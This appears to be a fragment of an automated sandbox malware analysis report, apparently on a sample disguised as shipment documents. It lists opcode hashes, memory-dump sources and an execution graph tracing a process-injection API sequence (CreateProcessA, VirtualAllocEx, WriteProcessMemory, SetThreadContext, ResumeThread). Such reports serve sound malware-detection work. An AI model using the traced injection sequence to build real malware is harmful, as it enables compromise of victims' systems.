                                                      • Instruction Fuzzy Hash: FEC1C274E11218CFDB54DFA9C994B9DBBB2BF89304F2080A9D809AB364DB355E85CF50
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 98d58ae152601d34960fac82b9b9f392eb1f156924b85aff3f8fd83f5b1f7c35
                                                      • Instruction ID: 4377c2247123c7e983c1c80e5e0825bd62d4deec0c7ab2d7f05eec7d08903869
                                                      • Opcode Fuzzy Hash: 98d58ae152601d34960fac82b9b9f392eb1f156924b85aff3f8fd83f5b1f7c35
                                                      • Instruction Fuzzy Hash: CDC1B274E10218CFDB54DFA9C954BADBBB2BF89304F1080A9D909AB364DB359E85CF50
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 68a47eaa187e273f377ed3dd9e357205607b09d7f8ffe8b52e0ccecd5fc24f43
                                                      • Instruction ID: 31f2aca570c4be760bb182fa0c08756ab2c9db074f398155e9abfc827d274560
                                                      • Opcode Fuzzy Hash: 68a47eaa187e273f377ed3dd9e357205607b09d7f8ffe8b52e0ccecd5fc24f43
                                                      • Instruction Fuzzy Hash: 4EC1B274E10218CFDB54DFA9C954B9DBBB2BF89304F1080A9D909AB364DB359E85CF50
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 42cd6b59af62bed5ce76e4b827632307e2111dd4407da0a6e8f2b145025e1933
                                                      • Instruction ID: da5adae2d0e01d7e1df155ee74ab29d7b869df7c3b726b5f21481e34b6945490
                                                      • Opcode Fuzzy Hash: 42cd6b59af62bed5ce76e4b827632307e2111dd4407da0a6e8f2b145025e1933
                                                      • Instruction Fuzzy Hash: 26C1B274E10218CFDB54DFA9C954B9DBBB2BF89304F2080A9D909AB364DB359E85CF50
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a9e440ea38dcdcab200b03b979f3aae1fc537c05d602ba37aaa75ec4efd93f8
                                                      • Instruction ID: 7e19a2d7ab1806546f36629fe0c1fc350b52d34d29ed1983d17c3ec6c40932c2
                                                      • Opcode Fuzzy Hash: 9a9e440ea38dcdcab200b03b979f3aae1fc537c05d602ba37aaa75ec4efd93f8
                                                      • Instruction Fuzzy Hash: 06C1C174E10218CFDB54DFA9C944BADBBB2BF89304F1080A9D909AB364DB359E85CF50
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b4100449e3bc42f7ed3b71f3210aa5dcb327ed570c97708c38d0c5029069fb33
                                                      • Instruction ID: bf38a5b8d3aa8ad269069275e8d8db85487a53cce48bec38f8f81770577ba709
                                                      • Opcode Fuzzy Hash: b4100449e3bc42f7ed3b71f3210aa5dcb327ed570c97708c38d0c5029069fb33
                                                      • Instruction Fuzzy Hash: 8FC1C174E10218CFDB54DFA9C954BADBBB2BF89300F2080A9D909AB354DB359E85CF51
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8a347cc799c1e1d1137db10784560cac175c196c9b421cc62aa1d24fa6eb206f
                                                      • Instruction ID: 2dd403afe161a74ee002bd6146f913b8abe7c9f70e03eec2e7d9e2893999c63c
                                                      • Opcode Fuzzy Hash: 8a347cc799c1e1d1137db10784560cac175c196c9b421cc62aa1d24fa6eb206f
                                                      • Instruction Fuzzy Hash: F9C1B174E10218CFDB54DFA9C954BADBBB2BF89300F2080A9D909AB354DB359E85CF50
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d015a7bfe1e40953ed37d44955a9dab8f86187b7da75e5bec0b1d2167733cd9d
                                                      • Instruction ID: 1b2dc6ac718517687824f54f76648bd28d62dd5e27341ae6b5c456b9afdc0d9d
                                                      • Opcode Fuzzy Hash: d015a7bfe1e40953ed37d44955a9dab8f86187b7da75e5bec0b1d2167733cd9d
                                                      • Instruction Fuzzy Hash: 60C1B274E10218CFDB54DFA9C954BADBBB2BF89304F1080A9D909AB354DB359E85CF50
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 71cba48efc9125134d462b318e02793cb77d00e712dd69f259d97190fd1f724c
                                                      • Instruction ID: e520828b37f997b2e8a478783738353c8de5d5b866782ab1d68b0ebbddbb25e8
                                                      • Opcode Fuzzy Hash: 71cba48efc9125134d462b318e02793cb77d00e712dd69f259d97190fd1f724c
                                                      • Instruction Fuzzy Hash: 17C1B274E10218CFDB54DFA9C954BADBBB2BF89304F2080A9D909AB354DB359E85CF50
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ce30a3e09a90ce5f847d3a7bb387dacf3174fd171adf43f651114fb265c5160d
                                                      • Instruction ID: 40af5d5de2129d90dd536c4ec3228bdb01a2d12f962076b7e25168e3472699c4
                                                      • Opcode Fuzzy Hash: ce30a3e09a90ce5f847d3a7bb387dacf3174fd171adf43f651114fb265c5160d
                                                      • Instruction Fuzzy Hash: 92C1B174E10218CFDB54DFA9C954BADBBB2BF89304F2080A9D909AB354DB359E85CF50
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 46f1461be5b6cce020881cab0441e51e82fbd3e099cd6e2dfd4c0ed4a0ae018e
                                                      • Instruction ID: 9ffa58ee6d054a8404a9059dec5db467d5a9e05f345c408f89dc72da99e18b61
                                                      • Opcode Fuzzy Hash: 46f1461be5b6cce020881cab0441e51e82fbd3e099cd6e2dfd4c0ed4a0ae018e
                                                      • Instruction Fuzzy Hash: 7DC1C174E10218CFDB54DFA9C994B9DBBB2BF89300F2080A9D909AB354DB359E85CF50
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c090a2ad55365e3be8d634a0c6979e094a9eb00423dc1f47acb9b3298078913c
                                                      • Instruction ID: 23262aebe387071f5ecfa71c34a0f37402f07aba564017a1c191084233b93a07
                                                      • Opcode Fuzzy Hash: c090a2ad55365e3be8d634a0c6979e094a9eb00423dc1f47acb9b3298078913c
                                                      • Instruction Fuzzy Hash: D2A19974A01228CFDB65DF24C994B9EBBB2BF4A304F1084EAD50EA7254DB319E81CF51
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b63e34a67dbfaa59b250a75fde21190e7deb3670f02dd2b3ef266e5776996434
                                                      • Instruction ID: 869afdc028828715cdb141b7b4ff1e12492826e15e371a6df9edbd8f5a33870e
                                                      • Opcode Fuzzy Hash: b63e34a67dbfaa59b250a75fde21190e7deb3670f02dd2b3ef266e5776996434
                                                      • Instruction Fuzzy Hash: 4F516470D14208CFDB06EFA9D9847ADFBB2BF89304F20D129E404AB698DB759881CF54
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a5b73eba95ea3ce871c8b9eade475f7cf7f16759633e36571d4800e056d06ecd
                                                      • Instruction ID: 6ec92d4b5d0df5612788444ae881a520533cb8a90a75793bd12435f857077c6f
                                                      • Opcode Fuzzy Hash: a5b73eba95ea3ce871c8b9eade475f7cf7f16759633e36571d4800e056d06ecd
                                                      • Instruction Fuzzy Hash: 07512370D15208CFCB12EFA8D5847EDBBB2BF49314F209129E419AB694DB759881CF54
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4155123537.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_68f0000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c291e2614c11bdd0d606322ff5eedf1815abcf9bac9b00956c45acee6420b615
                                                      • Instruction ID: 468b1cf0996731d8330747a78f515ebef9d43b1e917d8416296c1596ff5c3ec9
                                                      • Opcode Fuzzy Hash: c291e2614c11bdd0d606322ff5eedf1815abcf9bac9b00956c45acee6420b615
                                                      • Instruction Fuzzy Hash: 4551BF34A01228CFCB65DF24C854BADB7B2BF4A305F5089E9D50AA7354CB369E81CF50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Xbq$Xbq$Xbq$Xbq
                                                      • API String ID: 0-2732225958
                                                      • Opcode ID: 905cd99ae9629ca95898282c506743fe21038c1b75a4d8ea3104a90090156240
                                                      • Instruction ID: 766351782aa550778ae5bd0c3bf578815315cac7b3c05f7b6ad570b91c2c493c
                                                      • Opcode Fuzzy Hash: 905cd99ae9629ca95898282c506743fe21038c1b75a4d8ea3104a90090156240
                                                      • Instruction Fuzzy Hash: 04314171E042198BDFA6DF7989C13AFB6B6AB88300F1444B5E915A7394DF30CD85CB92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.4136988490.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_2a30000_rShipmentDocuments.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \;^q$\;^q$\;^q$\;^q
                                                      • API String ID: 0-3001612457
                                                      • Opcode ID: 628416a1f66d5079f6a16a36008809c527d19e6454143a35c04b12206382ff8b
                                                      • Instruction ID: a92f7a454c3bef82539ecb18423cfa9f3fa7c796e61f66c92a8eceff8d0db703
                                                      • Opcode Fuzzy Hash: 628416a1f66d5079f6a16a36008809c527d19e6454143a35c04b12206382ff8b
                                                      • Instruction Fuzzy Hash: 04019A31B40104AF8B6A8F2CC584A2537EEAB88F60725446AF446CF3B4DE21DC418788

                                                      Execution Graph

                                                      Execution Coverage: 10.6%
                                                      Dynamic/Decrypted Code Coverage: 100%
                                                      Signature Coverage: 0%
                                                      Total number of Nodes: 266
                                                      Total number of Limit Nodes: 17
                                                      execution_graph 36334 94d700 36335 94d702 DuplicateHandle 36334->36335 36336 94d796 36335->36336 36361 9446a0 36362 9446b7 36361->36362 36363 94478f 36362->36363 36365 9447b8 36362->36365 36366 9447da 36365->36366 36367 9447e5 36366->36367 36369 9448b0 36366->36369 36367->36362 36370 9448b5 36369->36370 36374 9449b0 36370->36374 36378 9449c0 36370->36378 36375 9449c0 36374->36375 36376 944ac4 36375->36376 36382 944610 36375->36382 36376->36376 36380 9449e7 36378->36380 36379 944ac4 36379->36379 36380->36379 36381 944610 CreateActCtxA 36380->36381 36381->36379 36383 945e50 CreateActCtxA 36382->36383 36385 945f13 36383->36385 36404 69cac68 36405 69cadf3 36404->36405 36406 69cac8e 36404->36406 36406->36405 36408 69c8718 36406->36408 36409 69caee8 PostMessageW 36408->36409 36410 69caf54 36409->36410 36410->36406 36337 94d4b8 36338 94d4fe GetCurrentProcess 36337->36338 36340 94d550 GetCurrentThread 36338->36340 36341 94d549 36338->36341 36342 94d586 36340->36342 36343 94d58d GetCurrentProcess 36340->36343 36341->36340 36342->36343 36346 94d5c3 36343->36346 36344 94d5eb GetCurrentThreadId 36345 94d61c 36344->36345 36346->36344 36347 94b138 36351 94b230 36347->36351 36356 94b21f 36347->36356 36348 94b147 36352 94b264 36351->36352 36353 94b241 36351->36353 36352->36348 36353->36352 36354 94b468 GetModuleHandleW 36353->36354 36355 94b495 36354->36355 36355->36348 36357 94b264 36356->36357 36358 94b241 36356->36358 36357->36348 36358->36357 36359 94b468 GetModuleHandleW 36358->36359 36360 94b495 36359->36360 36360->36348 36085 69c7d12 36086 69c7d18 36085->36086 36092 69c9a97 36086->36092 36112 69c99f2 36086->36112 36131 69c9a50 36086->36131 36150 69c9a00 36086->36150 36087 69c7d23 36093 69c9a35 36092->36093 36094 69c9a9b 36092->36094 36105 69c9a22 36093->36105 36169 69c9f5d 36093->36169 36182 69ca29c 36093->36182 36190 69ca1a3 36093->36190 36195 69ca462 36093->36195 36205 69ca2e0 36093->36205 36209 69ca306 36093->36209 
36214 69c9ee5 36093->36214 36218 69ca685 36093->36218 36223 69ca04d 36093->36223 36227 69ca331 36093->36227 36235 69ca017 36093->36235 36241 69c9e35 36093->36241 36245 69c9ffb 36093->36245 36250 69c9f7a 36093->36250 36255 69ca4d8 36093->36255 36272 69ca27e 36093->36272 36094->36087 36105->36087 36113 69c99f9 36112->36113 36114 69c9995 36113->36114 36115 69ca29c 4 API calls 36113->36115 36116 69c9f5d 4 API calls 36113->36116 36117 69ca27e 4 API calls 36113->36117 36118 69ca4d8 6 API calls 36113->36118 36119 69c9f7a 2 API calls 36113->36119 36120 69c9ffb 2 API calls 36113->36120 36121 69c9e35 2 API calls 36113->36121 36122 69ca017 2 API calls 36113->36122 36123 69ca331 4 API calls 36113->36123 36124 69ca04d 2 API calls 36113->36124 36125 69ca685 2 API calls 36113->36125 36126 69c9ee5 2 API calls 36113->36126 36127 69ca306 2 API calls 36113->36127 36128 69ca2e0 2 API calls 36113->36128 36129 69ca462 4 API calls 36113->36129 36130 69ca1a3 2 API calls 36113->36130 36114->36087 36115->36114 36116->36114 36117->36114 36118->36114 36119->36114 36120->36114 36121->36114 36122->36114 36123->36114 36124->36114 36125->36114 36126->36114 36127->36114 36128->36114 36129->36114 36130->36114 36133 69c99f5 36131->36133 36132 69c9a22 36132->36087 36133->36131 36133->36132 36134 69ca29c 4 API calls 36133->36134 36135 69c9f5d 4 API calls 36133->36135 36136 69ca27e 4 API calls 36133->36136 36137 69ca4d8 6 API calls 36133->36137 36138 69c9f7a 2 API calls 36133->36138 36139 69c9ffb 2 API calls 36133->36139 36140 69c9e35 2 API calls 36133->36140 36141 69ca017 2 API calls 36133->36141 36142 69ca331 4 API calls 36133->36142 36143 69ca04d 2 API calls 36133->36143 36144 69ca685 2 API calls 36133->36144 36145 69c9ee5 2 API calls 36133->36145 36146 69ca306 2 API calls 36133->36146 36147 69ca2e0 2 API calls 36133->36147 36148 69ca462 4 API calls 36133->36148 36149 69ca1a3 2 API calls 36133->36149 36134->36132 36135->36132 36136->36132 36137->36132 36138->36132 36139->36132 36140->36132 
36141->36132 36142->36132 36143->36132 36144->36132 36145->36132 36146->36132 36147->36132 36148->36132 36149->36132 36151 69c9a1a 36150->36151 36152 69ca29c 4 API calls 36151->36152 36153 69c9f5d 4 API calls 36151->36153 36154 69ca27e 4 API calls 36151->36154 36155 69ca4d8 6 API calls 36151->36155 36156 69c9f7a 2 API calls 36151->36156 36157 69c9ffb 2 API calls 36151->36157 36158 69c9e35 2 API calls 36151->36158 36159 69ca017 2 API calls 36151->36159 36160 69ca331 4 API calls 36151->36160 36161 69ca04d 2 API calls 36151->36161 36162 69c9a22 36151->36162 36163 69ca685 2 API calls 36151->36163 36164 69c9ee5 2 API calls 36151->36164 36165 69ca306 2 API calls 36151->36165 36166 69ca2e0 2 API calls 36151->36166 36167 69ca462 4 API calls 36151->36167 36168 69ca1a3 2 API calls 36151->36168 36152->36162 36153->36162 36154->36162 36155->36162 36156->36162 36157->36162 36158->36162 36159->36162 36160->36162 36161->36162 36162->36087 36163->36162 36164->36162 36165->36162 36166->36162 36167->36162 36168->36162 36170 69c9f74 36169->36170 36174 69c7379 ResumeThread 36170->36174 36289 69c7380 36170->36289 36171 69ca40d 36172 69ca46d 36171->36172 36181 69c7380 ResumeThread 36171->36181 36285 69c7379 36171->36285 36173 69ca3ea 36172->36173 36178 69c7508 VirtualAllocEx 36172->36178 36179 69c7501 VirtualAllocEx 36172->36179 36293 69c7501 36173->36293 36297 69c7508 36173->36297 36174->36171 36178->36173 36179->36173 36181->36171 36183 69ca340 36182->36183 36301 69c76b8 36183->36301 36305 69c76b0 36183->36305 36184 69ca744 36185 69c9f03 36185->36184 36186 69c7508 VirtualAllocEx 36185->36186 36187 69c7501 VirtualAllocEx 36185->36187 36186->36185 36187->36185 36192 69c9f03 36190->36192 36191 69ca744 36192->36191 36193 69c7508 VirtualAllocEx 36192->36193 36194 69c7501 VirtualAllocEx 36192->36194 36193->36192 36194->36192 36196 69ca40d 36195->36196 36197 69ca46d 36195->36197 36196->36195 36203 69c7379 ResumeThread 36196->36203 36204 69c7380 ResumeThread 36196->36204 36198 69ca3ea 
                                                      36197->36198 36201 69c7508 VirtualAllocEx 36197->36201 36202 69c7501 VirtualAllocEx 36197->36202 36199 69c7508 VirtualAllocEx 36198->36199 36200 69c7501 VirtualAllocEx 36198->36200 36199->36198 36200->36198 36201->36198 36202->36198 36203->36196 36204->36196 36206 69c9f03 36205->36206 36207 69c7508 VirtualAllocEx 36206->36207 36208 69c7501 VirtualAllocEx 36206->36208 36207->36206 36208->36206 36210 69ca517 36209->36210 36309 69c7429 36210->36309 36313 69c7430 36210->36313 36211 69ca532 36215 69c9eeb 36214->36215 36216 69c7508 VirtualAllocEx 36215->36216 36217 69c7501 VirtualAllocEx 36215->36217 36216->36215 36217->36215 36219 69ca69d 36218->36219 36317 69c75c8 36219->36317 36321 69c75c1 36219->36321 36220 69ca6c1 36225 69c75c8 WriteProcessMemory 36223->36225 36226 69c75c1 WriteProcessMemory 36223->36226 36224 69ca080 36225->36224 36226->36224 36228 69ca340 36227->36228 36231 69c76b8 ReadProcessMemory 36228->36231 36232 69c76b0 ReadProcessMemory 36228->36232 36229 69ca744 36230 69c9f03 36230->36229 36233 69c7508 VirtualAllocEx 36230->36233 36234 69c7501 VirtualAllocEx 36230->36234 36231->36230 36232->36230 36233->36230 36234->36230 36236 69c9fad 36235->36236 36236->36105 36238 69c9e93 36236->36238 36239 69c75c8 WriteProcessMemory 36236->36239 36240 69c75c1 WriteProcessMemory 36236->36240 36237 69ca7c7 36238->36105 36239->36237 36240->36237 36325 69c7844 36241->36325 36330 69c7850 36241->36330 36246 69ca002 36245->36246 36248 69c75c8 WriteProcessMemory 36246->36248 36249 69c75c1 WriteProcessMemory 36246->36249 36247 69ca7c7 36248->36247 36249->36247 36251 69c9f87 36250->36251 36253 69c75c8 WriteProcessMemory 36251->36253 36254 69c75c1 WriteProcessMemory 36251->36254 36252 69ca6c1 36253->36252 36254->36252 36256 69ca5d3 36255->36256 36266 69c7429 Wow64SetThreadContext 36256->36266 36267 69c7430 Wow64SetThreadContext 36256->36267 36257 69ca83a 36257->36105 36258 69ca295 36258->36257 36262 69c7379 ResumeThread 36258->36262 36263 69c7380 ResumeThread 36258->36263
                                                      36259 69ca40d 36260 69ca46d 36259->36260 36268 69c7379 ResumeThread 36259->36268 36269 69c7380 ResumeThread 36259->36269 36261 69ca3ea 36260->36261 36264 69c7508 VirtualAllocEx 36260->36264 36265 69c7501 VirtualAllocEx 36260->36265 36270 69c7508 VirtualAllocEx 36261->36270 36271 69c7501 VirtualAllocEx 36261->36271 36262->36259 36263->36259 36264->36261 36265->36261 36266->36258 36267->36258 36268->36259 36269->36259 36270->36261 36271->36261 36273 69ca284 36272->36273 36281 69c7379 ResumeThread 36273->36281 36282 69c7380 ResumeThread 36273->36282 36274 69ca40d 36275 69ca46d 36274->36275 36277 69c7379 ResumeThread 36274->36277 36278 69c7380 ResumeThread 36274->36278 36276 69ca3ea 36275->36276 36283 69c7508 VirtualAllocEx 36275->36283 36284 69c7501 VirtualAllocEx 36275->36284 36279 69c7508 VirtualAllocEx 36276->36279 36280 69c7501 VirtualAllocEx 36276->36280 36277->36274 36278->36274 36279->36276 36280->36276 36281->36274 36282->36274 36283->36276 36284->36276 36286 69c7381 ResumeThread 36285->36286 36288 69c73f1 36286->36288 36288->36171 36290 69c73c0 ResumeThread 36289->36290 36292 69c73f1 36290->36292 36292->36171 36294 69c7509 VirtualAllocEx 36293->36294 36296 69c7585 36294->36296 36296->36173 36298 69c7548 VirtualAllocEx 36297->36298 36300 69c7585 36298->36300 36300->36173 36302 69c7703 ReadProcessMemory 36301->36302 36304 69c7747 36302->36304 36304->36185 36306 69c76b9 ReadProcessMemory 36305->36306 36308 69c7747 36306->36308 36308->36185 36310 69c7431 Wow64SetThreadContext 36309->36310 36312 69c74bd 36310->36312 36312->36211 36314 69c7475 Wow64SetThreadContext 36313->36314 36316 69c74bd 36314->36316 36316->36211 36318 69c7610 WriteProcessMemory 36317->36318 36320 69c7667 36318->36320 36320->36220 36322 69c75c9 WriteProcessMemory 36321->36322 36324 69c7667 36322->36324 36324->36220 36327 69c784d 36325->36327 36326 69c77e8 36326->36105 36327->36326 36328 69c7a3e CreateProcessA 36327->36328 36329 69c7a9b 36328->36329 36329->36329 36331 69c78d9 CreateProcessA
36330->36331 36333 69c7a9b 36331->36333 36333->36333 36386 4ce39a0 36388 4ce39d1 36386->36388 36387 4ce39e9 36388->36387 36392 4ce4550 36388->36392 36397 4ce4560 36388->36397 36389 4ce3afc 36393 4ce4518 36392->36393 36394 4ce4553 36392->36394 36393->36389 36400 4ce2f9c 36394->36400 36398 4ce457d 36397->36398 36399 4ce2f9c DrawTextExW 36397->36399 36398->36389 36399->36398 36401 4ce4598 DrawTextExW 36400->36401 36403 4ce457d 36401->36403 36403->36389

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 304 94d4a9-94d547 GetCurrentProcess 309 94d550-94d584 GetCurrentThread 304->309 310 94d549-94d54f 304->310 311 94d586-94d58c 309->311 312 94d58d-94d5c1 GetCurrentProcess 309->312 310->309 311->312 314 94d5c3-94d5c9 312->314 315 94d5ca-94d5e5 call 94d687 312->315 314->315 317 94d5eb-94d61a GetCurrentThreadId 315->317 319 94d623-94d685 317->319 320 94d61c-94d622 317->320 320->319
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0094D536
                                                      • GetCurrentThread.KERNEL32 ref: 0094D573
                                                      • GetCurrentProcess.KERNEL32 ref: 0094D5B0
                                                      • GetCurrentThreadId.KERNEL32 ref: 0094D609
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764461525.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_940000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 00a089a2cb2a66c7d3fe0913521d3e5ed771f9486213387296142b5112343512
                                                      • Instruction ID: 3b15a5a39782878258281f49fc031a1337692c16e5c7adeff8d56abfef441208
                                                      • Opcode Fuzzy Hash: 00a089a2cb2a66c7d3fe0913521d3e5ed771f9486213387296142b5112343512
                                                      • Instruction Fuzzy Hash: 1C5188B09013488FDB14DFA9D548BAEBBF5EF88304F20C06AE448A7364DB749984CF65

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 327 94d4b8-94d547 GetCurrentProcess 331 94d550-94d584 GetCurrentThread 327->331 332 94d549-94d54f 327->332 333 94d586-94d58c 331->333 334 94d58d-94d5c1 GetCurrentProcess 331->334 332->331 333->334 336 94d5c3-94d5c9 334->336 337 94d5ca-94d5e5 call 94d687 334->337 336->337 339 94d5eb-94d61a GetCurrentThreadId 337->339 341 94d623-94d685 339->341 342 94d61c-94d622 339->342 342->341
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0094D536
                                                      • GetCurrentThread.KERNEL32 ref: 0094D573
                                                      • GetCurrentProcess.KERNEL32 ref: 0094D5B0
                                                      • GetCurrentThreadId.KERNEL32 ref: 0094D609
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764461525.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_940000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 1a4e3dba9d4fef44e80c6dd45420e9b15b8a04a2fda653c2b4b5ca5844644510
                                                      • Instruction ID: edfb166b99bc1eb91b708fb0719b232cd2f71d503756ab38b6e505588fb3079f
                                                      • Opcode Fuzzy Hash: 1a4e3dba9d4fef44e80c6dd45420e9b15b8a04a2fda653c2b4b5ca5844644510
                                                      • Instruction Fuzzy Hash: 985167B09013098FDB14DFAAD548BAEBBF5EF88304F20C059E459A7360DB759984CF65

                                                      Control-flow Graph
                                                      control_flow_graph 501 69c7844-69c784d 503 69c784f-69c78e5 501->503 504 69c77e8-69c780a 501->504 510 69c791e-69c793e 503->510 511 69c78e7-69c78f1 503->511 508 69c780c-69c7812 504->508 509 69c7813-69c7838 504->509 508->509 521 69c7977-69c79a6 510->521 522 69c7940-69c794a 510->522 511->510 512 69c78f3-69c78f5 511->512 515 69c7918-69c791b 512->515 516 69c78f7-69c7901 512->516 515->510 518 69c7905-69c7914 516->518 519 69c7903 516->519 518->518 523 69c7916 518->523 519->518 528 69c79df-69c7a99 CreateProcessA 521->528 529 69c79a8-69c79b2 521->529 522->521 524 69c794c-69c794e 522->524 523->515 526 69c7950-69c795a 524->526 527 69c7971-69c7974 524->527 530 69c795c 526->530 531 69c795e-69c796d 526->531 527->521 542 69c7a9b-69c7aa1 528->542 543 69c7aa2-69c7b28 528->543 529->528 533 69c79b4-69c79b6 529->533 530->531 531->531 532 69c796f 531->532 532->527 534 69c79b8-69c79c2 533->534 535 69c79d9-69c79dc 533->535 537 69c79c4 534->537 538 69c79c6-69c79d5 534->538 535->528 537->538 538->538 540 69c79d7 538->540 540->535 542->543 553 69c7b38-69c7b3c 543->553 554 69c7b2a-69c7b2e 543->554 556 69c7b4c-69c7b50 553->556 557 69c7b3e-69c7b42 553->557 554->553 555 69c7b30 554->555 555->553 559 69c7b60-69c7b64 556->559 560 69c7b52-69c7b56 556->560 557->556 558 69c7b44 557->558 558->556 562 